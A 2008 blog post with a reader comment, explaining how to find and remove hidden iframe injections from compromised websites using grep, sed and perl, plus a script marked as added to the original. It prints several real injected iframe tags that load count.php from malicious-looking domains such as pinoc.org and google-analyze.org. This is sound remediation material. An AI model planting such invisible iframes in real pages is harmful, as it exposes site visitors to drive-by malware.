Wednesday, November 26, 2008

Cleaning Iframe Injections, Lesson 1

Pretty often we get complaints that Google has marked a site as malicious. Usually this is an iframe injection, like 90% of the time. Sometimes it's a PHP shell, but that's another blog entry. First step is to grab the page. Please use curl or wget for this. You COULD just surf to it, but we're security professionals, right?

You'll find something like this:

<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Or:

<iframe src="http://pinoc.org/count.php?o=2" </iframe>
<iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Or:

<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://yahoo-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


Here's a handy perl one-liner for the pinoc domains (courtesy of http://blog.floogy.com/2008/08/fix-pinocorg-and-pinocinfo.html thanks!):

find /PATH/TO/START/FROM/ -type f -print0 | xargs -0 perl -pi -e 's/\<iframe src\=\"http\:\/\/pinoc\.info\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>\<iframe src\=\"http\:\/\/pinoc\.org\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>//g'

To remove using sed instead:

First we make a grep string that catches the whole iframe tag. I like egrep (grep -E):

From:

<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

To:

grep -HRE "<iframe src=\"http:\/\/google-analyze\.org\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>"

Note that the only difference between the tags is the domain they point at. The path, the query string and all of the attributes are identical, so one pattern with a wildcard in place of the host catches every variant, and we use that to clean everything at once.

grep -HRE "<iframe src=\"http:\/\/.*\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>" /home/user/*

This should find ALL of the injections. Be sure to redirect the output to a text file for later. Using -lRE instead of -HRE makes grep print just the names of the matching files, once each. Now we build our sed-line:

# [^"]* stands in for the host name and stops at the closing quote, so two injected tags on one line are removed one at a time and any real markup between them survives:
sed "s/<iframe src=\"http:\/\/[^\"]*\/count\.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"

And attach it to our list (you DID make a list of filenames by using -lRE for grep and redirecting the output, right?):

# -i makes sed rewrite each file in place instead of printing the result to stdout
cat ~/thelist.txt | xargs sed -i "s/<iframe src=\"http:\/\/[^\"]*\/count\.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"

This feeds thelist.txt into xargs, which runs the sed-line on every file in the list. xargs splits its input on whitespace, so fix any paths with spaces first or sed will be handed the wrong file names. If we're lucky, this results in a clean home directory for your client :). If we aren't, well, hope you backed them up first! sed will keep a backup of every file it touches if we give -i a suffix, -i.ext:

# -i.shanbak rewrites each file in place and leaves the original beside it as FILE.shanbak
cat ~/thelist.txt | xargs sed -i.shanbak "s/<iframe src=\"http:\/\/[^\"]*\/count\.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"


I use shanbak in case the client has other .bak files. This makes cleaning up the backups after you've verified the iframes are gone a piece of cake, and less hazardous to the client's own backups.
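The whole procedure above (list the files carrying the hidden count.php?o=2 iframe, strip it in place with a .shanbak backup, confirm nothing is left) as one added shell script, not code from the original post. It tightens the post's .* to [^"]* so two tags on the same line are removed one at a time and legitimate markup between them survives, and lets find call sed directly instead of piping a list through xargs so paths with spaces work. The sample tree, its file names and contents are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the original post. One pattern drives both the
# grep that lists infected files and the sed that strips the tag in place.
# [^"]* replaces the post's .* so a line holding two injected tags around real
# markup loses only the tags; [?] is a literal ? in both BRE and ERE, so grep -E
# and plain sed can share the string.
IFRAME_RE='<iframe src="http://[^"]*/count\.php[?]o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'

# Print, one per line, the files under $1 that still carry the tag.
# find -exec hands each path over intact, so "sub dir/page.html" is safe.
list_infected() {
    find "$1" -type f ! -name '*.shanbak' -exec grep -lE "$IFRAME_RE" {} + || :
}

# Number of files under $1 still carrying the tag.
count_infected() { list_infected "$1" | wc -l | tr -d ' '; }

# Strip the tag from every infected file under $1, keeping a .shanbak copy of
# each file sed actually touched; clean files get no backup.
clean_tree() {
    find "$1" -type f ! -name '*.shanbak' \
        -exec grep -qE "$IFRAME_RE" {} \; \
        -exec sed -i.shanbak "s|$IFRAME_RE||g" {} \;
}

# Constructed sample tree mirroring the tags quoted in the post.
inject_tag() {   # emit the injected iframe for domain $1
    printf '<iframe src="http://%s/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>' "$1"
}

make_sample() {  # $1 = scratch directory to populate
    mkdir -p "$1/sub dir"
    { printf '<html><body>hello</body></html>\n'; inject_tag pinoc.org; printf '\n'; } > "$1/index.html"
    { printf '<p>Keep me</p>'; inject_tag google-analyze.org; inject_tag yahoo-analytics.net; printf '<p>and me</p>\n'; } > "$1/sub dir/page.html"
    printf '<p>nothing injected here</p>\n' > "$1/clean.html"
}

run_demo() {     # $1 = scratch directory
    make_sample "$1"
    echo "before: $(count_infected "$1") infected file(s)"
    list_infected "$1"
    clean_tree "$1"
    echo "after:  $(count_infected "$1") infected file(s)"
}

run_demo "$(mktemp -d)"
```

Point clean_tree at the real document root once list_infected shows only the expected files; the .shanbak copies can be deleted after a second list_infected run comes back empty.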

ich1 out.

2 comments:

Unknown said...

Rather than using xargs, a more elegant solution would be to use read to read the entire line. This will handle filenames with spaces without issues.

Ex:
cat ~/thelist.txt | while IFS= read -r FILE; do sed -i.shanbak "s/<iframe src=\"http:\/\/[^\"]*\/count\.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g" "$FILE"; done

ich1 said...

TMTOWTSAC: There's more than one way to skin a cat....

Good solution, less work.